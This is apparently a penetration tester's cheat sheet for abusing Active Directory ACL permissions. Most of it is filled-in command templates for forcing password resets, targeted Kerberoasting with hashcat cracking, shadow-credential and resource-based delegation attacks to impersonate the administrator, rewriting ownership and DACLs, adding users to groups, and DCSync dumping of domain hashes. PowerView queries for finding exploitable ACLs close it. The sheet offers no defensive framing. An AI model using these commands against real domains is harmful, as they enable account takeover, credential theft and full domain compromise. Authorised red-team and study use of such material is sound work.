ACL
ACLs
ForceChangePassword
net rpc password <TargetUser> <new_password> -U "DOMAIN"/"ControlledUser"%"Password" -S <DomainController>
bloodyAD --host <ip> -d <dc> -u <username> -p <password> set password <target_userename> <new_password>
GenericWrite
targetKerberoasting
python targetedKerberoast.py -v -d <domain> -u <username> -p <password>
hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force
shadowCredentials
certipy shadow auto -u username@domain -p <password> -account <target_username> -dc-ip <ip>
Using Kerberos
certipy shadow auto -username username@domain -p <password> -k -account <target_username> -target <dc>
GenericALL
Password Change
net rpc password <username> <new_password> -U <domain>/<username>%<hash> -S <dc> --pw-nt-hash
RBCD
rbcd.py -delegate-from '<machine_name>' -delegate-to '<target>' -dc-ip <ip> -action 'write' '<domain>/<username>:<password>'
getST.py -spn 'cifs/<dc>' -impersonate administrator -dc-ip <ip> '<domain>/<machine_name>:<password>'
export KRB5CCNAME=administrator.ccache
WriteOwner
owneredit.py -action write -new-owner <username> -target <group_name> <domain>/<username>:<password>
dacledit.py -action 'write' -rights 'WriteMembers' -principal <username> -target-dn <dn> <domain>/<username>:<password>
AddKeyCredentialLink
python3 pywhisker.py -d <domain> --dc-ip <ip> -u <username> -H :<hashes> --target <target_username> --action "add"
certipy shadow auto -username <username>@<domain> -hashes :<hashes> -account <target_username>
DCSync
secretsdump.py <dc> -k
nxc smb <domain> -u <username> -p <password> --ntds
nxc smb <domain> -k --use-kcache --ntds
Tools
bloodyAD
Adding a user to a group
bloodyAD -d <domain> -u <username> -p <password> --host <dc> add groupMember <group_name> <username>
Giving the user GenericAll
bloodyAD -d <domain> -u <username> -p <password> --host <dc> add genericAll <dn> <username>
Change User Password
bloodyAD -d <domain> -u <username> -p <password> --host <dc> set password <target_username> <new_password>
powerview.py
powerview $domain/$username:'$password'@$domain -k
PV > Get-DomainObjectAcl -Identity ServiceMGMT
PowerView
Find-InterestingDomainACL -ResolveGUIDS | ?{$_.IdentityReferenceName -match "username"}
Or get everything in json format and jq it
Find-InterestingDomainACL -ResolveGUIDS | ConvertTo-Json
cat acls.json | jq ' .[] | select (.IdentityReferenceName == "username")'
Or
cat acls.json | jq '.[]' -c | grep -i username | jq .